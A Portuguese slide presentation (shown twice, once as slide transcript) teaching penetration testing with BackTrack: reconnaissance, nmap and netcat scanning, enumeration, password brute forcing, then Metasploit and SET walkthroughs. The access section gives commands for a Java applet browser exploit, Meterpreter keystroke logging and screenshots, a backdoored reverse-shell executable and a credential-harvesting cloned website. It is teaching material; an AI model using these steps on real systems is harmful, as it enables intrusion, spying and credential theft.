Kleber Santos
Introdução
Introdução
O que é?
• Ferramenta voltada para testes de
penetração;
• Primeira versão lançada em 2006;
• Possui mais de 300 ferramentas para
tais testes;
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

http://www.backtrack-linux.org/
Introdução
Uso em Certificações

• Todas oferecidas pela Offensive Security que
mantém o BackTrack.
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

http://www.backtrackbrasil.com.br/site/vd/
Pentest
•
•
•
•

Metodologia para testes de penetração;
Simula ataques;
Verifica a segurança de um sistema;
Possibilita criação de mecanismos de
defesa;
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;

• Abordaremos as três primeiras etapas
divididas em quatro partes;
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;

• Abordaremos as três primeiras etapas
divididas em quatro partes;
Primeira Parte
•
•
•
•

Obtenção de Informação;
Detecção de Sistemas Ativos;
Técnica Para Obter Informações DNS;
FINGERPRINT;
Obtenção de Informação
• Metodologia usada para "reconhecimento do
terreno";

• Pode ser de forma:
 passiva (recursos na internet);
 ativa (engenharia social);
Detecção de
Sistemas Ativos
• Princípios básicos na obtenção de
informações;
• PING detecta hosts ativos;
Detecção de
Sistemas Ativos
FPING:
 Executa ping para diferentes hosts ao
mesmo tempo através de um *.txt;

HPING3:
 Detecta hosts, regras de firewall e realiza
varreduras de portas;

Genlist:
 Verifica uma lista de hosts ativos;
Informações DNS
• DNS traduz endereços de IP em
nomes de domínio;
• A ferramenta nslookup permite obter
informações sobre DNS;
Informações DNS
DNSENUM:
 Pesquisa de hosts, nomes de servidores, registros MX, IPs,
etc.
DNSMAP:
 Descobre subdomínios relacionados ao domínio-alvo.
Acompanha wordlist;
DNSRECON:
 Permite consultas reversas por faixas de IP, NS, SOA, registros
MX, transferências de zonas e enumeração de serviços;
FIERCE:
 Retorna informações adicionais como HINFO, especificando o
processador da máquina e o servidor;
FINGERPRINT
• Técnica na qual se obtém informações
sobre sistema operacional;
• O NMAP é utilizado para tal checagem
de versões;

root@bt~# nmap –O <ip_do_alvo>
FINGERPRINT
TCP SYN (-sS)
 examina portas de maneira rápida e difícil de
ser detectado por firewalls ou IDS;
TCP Connect (-sT)
 executa varredura utilizando o Three-Way
Handshake;
UDP (-sU)
 possibilita varredura do protocolo UDP;
FINGERPRINT
TCP FIN (-sF, -sX, -sN)
 utilizados na tentativa de travessia de
firewalls;
TCP ACK (-sA)
 tática utilizada para detecção de regras de
firewall;
TCP Windows (-sW)
 varreduras por janelas, parecido com o método
ACK, porém consegue detectar portas abertas
versus filtradas e não filtradas;
Segunda Parte
• SCANNING de portas
• Detecção de Sistemas Ativos;
• NETCAT – Canivete Suíço;
SCANNING de portas
• Port Scan é a técnica usada para descobrir
serviços vulneráveis em um sistema;
Scanning de portas:
 identifica portas ativas;
De vulnerabilidades:
 identifica fraquezas no sistema;

De redes:
 identifica os hosts ativos;
Detecção de Sistemas Ativos
NETCAT – Canivete Suíço
• Outra ferramenta possível para
varreduras num host;
root@root:~# nc -v -z 192.168.32.128 1-4000
Terceira Parte
• Fase de Enumeração;
• HTTPRINT;
• AMAP, SMTP e SMTPSCAN;
Fase de Enumeração
• Nesta fase o invasor tenta obter:





nomes de máquinas;
usuários;
serviços e versões;
compartilhamentos, etc;

• A ferramenta Nbtscan nos permite obter
nome e endereço MAC de um alvo;
Fase de Enumeração
• Através do nmap podemos executar
varredura procurando por serviços que
utilizem o protocolo UDP:
root@root~# nmap –T4 –sU –sV
<ip_host_alvo>
Fase de Enumeração
• Obtendo retorno de serviços snmp
podemos obter informações SNMP
com o Snmpcheck:
root@root:/pentest/enumeration/sn
mp/snmpcheck# ./snmpcheck-1.8.pl
–t <ip_host_alvo>
HTTPRINT
• Possibilita detectar versões de
servidores;
• Fornece opção de exporta-las para
arquivos *.html, *.csv ou *.xml
AMAP, SMTP e SMTPSCAN
AMAP

 tenta identificar aplicações rodando em
portas diferentes da usual.
SMTP e SMTPScan

 busca usuários válidos do nosso host,
destinando um IP alvo;
Quarta Parte
• Ganho de Acesso;
• Abordagem à Força Bruta;
• SET e Metasploit;
Ganho de Acesso
• Utiliza de ferramentas que explorem
serviços como FTP e SSH;
• Explora vulnerabilidades e senhas;
• A técnica de engenharia social é
extremamente importante em tal etapa;
Força Bruta
xHydra ou Hidra-GTK
 Ferramenta utilizada para quebra de senhas
ONLINE;
 Suporta diversos protocolos;
 Permite utilização de arquivos auxiliares
para listas de usuários e senhas (wordlists);
Força Bruta
• Dicionários e força bruta são técnicas
utilizadas para o password cracking;
• Outras ferramentas para o mesmo intuito
são:
 Medusa;
 John The Ripper;
Todas elas inclusas no BackTrack 5 R3;
Invadindo Sistemas com
SET e Metasploit
Metasploit
 Conta com uma interface gráfica
ARMITAGE e também a linha de
comando, MSFCONSOLE;
SET
 Tem como alvo fraquezas e estupidez
humanas;
Invadindo Sistemas com
SET e Metasploit
• Através do comando msfconsole
acessamos o Metasploit via linha de
comando;
• Configuraremos nossa máquina
BackTrack para receber informações
do alvo através de uma vulnerabilidade
do Java;
Invadindo Sistemas com
SET e Metasploit
Invadindo Sistemas com
SET e Metasploit
• root@bt:~# msfconsole
• root@bt:~# search java
• root@bt:~# use
exploit/multi/browser/java_sign
ed_applet
• root@bt:~# show options
Invadindo Sistemas com
SET e Metasploit
set srvhost <ip_local_host_backTrack>
set srvport 80
#seta a porta 80 como acesso
set uripath <caminho_para_link_url>
set appletname <nome_para_o_arquivo_jar>
exploit
Invadindo Sistemas com
SET e Metasploit
• Após acessar a URL gerada o alvo
permitirá acesso ao invasor;

sessions –i 1
# dá acesso à máquina alvo
sysinfo
# obtém informações da máquina
alvo
Invadindo Sistemas com
SET e Metasploit
help
# lista comandos do METERPRETER
screenshot
# obtém um print da tela da
máquina invadida
Invadindo Sistemas com
SET e Metasploit
keyscan_start
# starta um sniffer para captura
de navegação
keyscan_dump
# exibe informações capturadas
Invadindo Sistemas com
SET e Metasploit
• Técnica semelhante pode ser
explorada através da ferramenta SET
gerando-se um payload;
• Ao acessar a ferramenta, navega-se
em:

1 – Social Engineering Attacks;
4 – Create a Payload na Listener;
Invadindo Sistemas com
SET e Metasploit
• Deve-se informar o IP da máquina que
receberá as informações obtidas através
do payload (IP da máquina BackTrack);
• Feito isso, navega-se em:
2 – Windows Reverse TCP Meterpreter;
16 – Backdoored Executable (BEST);
Invadindo Sistemas com
SET e Metasploit
• Após informar a porta solicitada, ele gerará o
arquivo executável:
/pentest/exploits/set msf.exe
• Confirma-se com yes o start do listener;
• O acesso à máquina alvo se dará após a
execução do arquivo pela mesma e
executando:
sessions –i 1.
Invadindo Sistemas com
SET e Metasploit
• Com a mesma ferramenta SET,
podemos clonar páginas web para
obter informações de uma vítima
através das opções:
1
2
3
2

–
–
–
–

Social Engineering Attacks;
Website Attack Vectors;
Credential Harvester Attack Vectors;
Site Cloner;
Invadindo Sistemas com
SET e Metasploit
• Informa-se a URL do site a ser
clonado;
• Acessa-se através do IP da máquina
do atacante;
Obs.: Podemos atribuir um domínio ao IP para
facilitar o acesso pela vítima;
Conclusão
• Técnicas de invasão estão
diretamente atreladas às
vulnerabilidades dos sistemas e das pessoas
Conclusão
•
•
•
•
•

Configurar devidamente servidores;
Atualizar devidamente SOs e SWs;
Utilização de senhas fortes;
Desconfiar de coisas óbvias;
Usufruir de uma política de segurança;
Conclusão
• Atentar à boas práticas voltadas
à segurança nos dá uma garantia quanto
ao CID;
klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
Obrigado !
Back track   apresentação

Back track apresentação

  • 1.
  • 4.
  • 5.
    Introdução O que é? •Ferramenta voltada para testes de penetração; • Primeira versão lançada em 2006; • Possui mais de 300 ferramentas para tais testes;
  • 6.
    Devido ao tamanhodo arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrack-linux.org/
  • 7.
    Introdução Uso em Certificações •Todas oferecidas pela Offensive Security que mantém o BackTrack.
  • 8.
    Devido ao tamanhodo arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrackbrasil.com.br/site/vd/
  • 9.
    Pentest • • • • Metodologia para testesde penetração; Simula ataques; Verifica a segurança de um sistema; Possibilita criação de mecanismos de defesa;
  • 10.
    Pentest • Procedimentos divididosem cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 11.
    Pentest • Procedimentos divididosem cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 12.
    Primeira Parte • • • • Obtenção deInformação; Detecção de Sistemas Ativos; Técnica Para Obter Informações DNS; FINGERPRINT;
  • 13.
    Obtenção de Informação •Metodologia usada para "reconhecimento do terreno"; • Pode ser de forma:  passiva (recursos na internet);  ativa (engenharia social);
  • 14.
    Detecção de Sistemas Ativos •Princípios básicos na obtenção de informações; • PING detecta hosts ativos;
  • 16.
    Detecção de Sistemas Ativos FPING: Executa ping para diferentes hosts ao mesmo tempo através de um *.txt; HPING3:  Detecta hosts, regras de firewall e realiza varreduras de portas; Genlist:  Verifica uma lista de hosts ativos;
  • 17.
    Informações DNS • DNStraduz endereços de IP em nomes de domínio; • A ferramenta nslookup permite obter informações sobre DNS;
  • 19.
    Informações DNS DNSENUM:  Pesquisade hosts, nomes de servidores, registros MX, IPs, etc. DNSMAP:  Descobre subdomínios relacionados ao domínio-alvo. Acompanha wordlist; DNSRECON:  Permite consultas reversas por faixas de IP, NS, SOA, registros MX, transferências de zonas e enumeração de serviços; FIERCE:  Retorna informações adicionais como HINFO, especificando o processador da máquina e o servidor;
  • 20.
    FINGERPRINT • Técnica naqual se obtém informações sobre sistema operacional; • O NMAP é utilizado para tal checagem de versões; root@bt~# nmap –O <ip_do_alvo>
  • 21.
    FINGERPRINT TCP SYN (-sS) examina portas de maneira rápida e difícil de ser detectado por firewalls ou IDS; TCP Connect (-sT)  executa varredura utilizando o Three-Way Handshake; UDP (-sU)  possibilita varredura do protocolo UDP;
  • 22.
    FINGERPRINT TCP FIN (-sF,-sX, -sN)  utilizados na tentativa de travessia de firewalls; TCP ACK (-sA)  tática utilizada para detecção de regras de firewall; TCP Windows (-sW)  varreduras por janelas, parecido com o método ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
  • 23.
    Segunda Parte • SCANNINGde portas • Detecção de Sistemas Ativos; • NETCAT – Canivete Suíço;
  • 24.
    SCANNING de portas •Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema; Scanning de portas:  identifica portas ativas; De vulnerabilidades:  identifica fraquezas no sistema; De redes:  identifica os hosts ativos;
  • 25.
  • 26.
    NETCAT – CaniveteSuíço • Outra ferramenta possível para varreduras num host; root@root:~# nc -v -z 192.168.32.128 1-4000
  • 27.
    Terceira Parte • Fasede Enumeração; • HTTPRINT; • AMAP, SMTP e SMTPSCAN;
  • 28.
    Fase de Enumeração •Nesta fase o invasor tenta obter:     nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc; • A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
  • 29.
    Fase de Enumeração •Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP: root@root~# nmap –T4 –sU –sV <ip_host_alvo>
  • 30.
    Fase de Enumeração •Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck: root@root:/pentest/enumeration/sn mp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
  • 31.
    HTTPRINT • Possibilita detectarversões de servidores; • Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
  • 34.
    AMAP, SMTP eSMTPSCAN AMAP  tenta identificar aplicações rodando em portas diferentes da usual. SMTP e SMTPScan  busca usuários válidos do nosso host, destinando um IP alvo;
  • 35.
    Quarta Parte • Ganhode Acesso; • Abordagem à Força Bruta; • SET e Metasploit;
  • 36.
    Ganho de Acesso •Utiliza de ferramentas que explorem serviços como FTP e SSH; • Explora vulnerabilidades e senhas; • A técnica de engenharia social é extremamente importante em tal etapa;
  • 37.
    Força Bruta xHydra ouHidra-GTK  Ferramenta utilizada para quebra de senhas ONLINE;  Suporta diversos protocolos;  Permite utilização de arquivos auxiliares para listas de usuários e senhas (wordlists);
  • 38.
    Força Bruta • Dicionáriose força bruta são técnicas utilizadas para o password cracking; • Outras ferramentas para o mesmo intuito são:  Medusa;  John The Ripper; Todas elas inclusas no BackTrack 5 R3;
  • 39.
    Invadindo Sistemas com SETe Metasploit Metasploit  Conta com uma interface gráfica ARMITAGE e também a linha de comando, MSFCONSOLE; SET  Tem como alvo fraquezas e estupidez humanas;
  • 40.
    Invadindo Sistemas com SETe Metasploit • Através do comando msfconsole acessamos o Metasploit via linha de comando; • Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
  • 41.
  • 42.
    Invadindo Sistemas com SETe Metasploit • root@bt:~# msfconsole • root@bt:~# search java • root@bt:~# use exploit/multi/browser/java_sign ed_applet • root@bt:~# show options
  • 43.
    Invadindo Sistemas com SETe Metasploit set srvhost <ip_local_host_backTrack> set srvport 80 #seta a porta 80 como acesso set uripath <caminho_para_link_url> set appletname <nome_para_o_arquivo_jar> exploit
  • 44.
    Invadindo Sistemas com SETe Metasploit • Após acessar a URL gerada o alvo permitirá acesso ao invasor; sessions –i 1 # dá acesso à máquina alvo sysinfo # obtém informações da máquina alvo
  • 45.
    Invadindo Sistemas com SETe Metasploit help # lista comandos do METERPRETER screenshot # obtém um print da tela da máquina invadida
  • 46.
    Invadindo Sistemas com SETe Metasploit keyscan_start # starta um sniffer para captura de navegação keyscan_dump # exibe informações capturadas
  • 47.
    Invadindo Sistemas com SETe Metasploit • Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload; • Ao acessar a ferramenta, navega-se em: 1 – Social Engineering Attacks; 4 – Create a Payload na Listener;
  • 48.
    Invadindo Sistemas com SETe Metasploit • Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack); • Feito isso, navega-se em: 2 – Windows Reverse TCP Meterpreter; 16 – Backdoored Executable (BEST);
  • 49.
    Invadindo Sistemas com SETe Metasploit • Após informar a porta solicitada, ele gerará o arquivo executável: /pentest/exploits/set msf.exe • Confirma-se com yes o start do listener; • O acesso à máquina alvo se dará após a execução do arquivo pela mesma e executando: sessions –i 1.
  • 50.
    Invadindo Sistemas com SETe Metasploit • Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções: 1 2 3 2 – – – – Social Engineering Attacks; Website Attack Vectors; Credential Harvester Attack Vectors; Site Cloner;
  • 51.
    Invadindo Sistemas com SETe Metasploit • Informa-se a URL do site a ser clonado; • Acessa-se através do IP da máquina do atacante; Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
  • 52.
    Conclusão • Técnicas deinvasão estão diretamente atreladas às vulnerabilidades dos sistemas e das pessoas
  • 53.
    Conclusão • • • • • Configurar devidamente servidores; Atualizardevidamente SOs e SWs; Utilização de senhas fortes; Desconfiar de coisas óbvias; Usufruir de uma política de segurança;
  • 54.
    Conclusão • Atentar àboas práticas voltadas à segurança nos dá uma garantia quanto ao CID;
  • 56.
  • 57.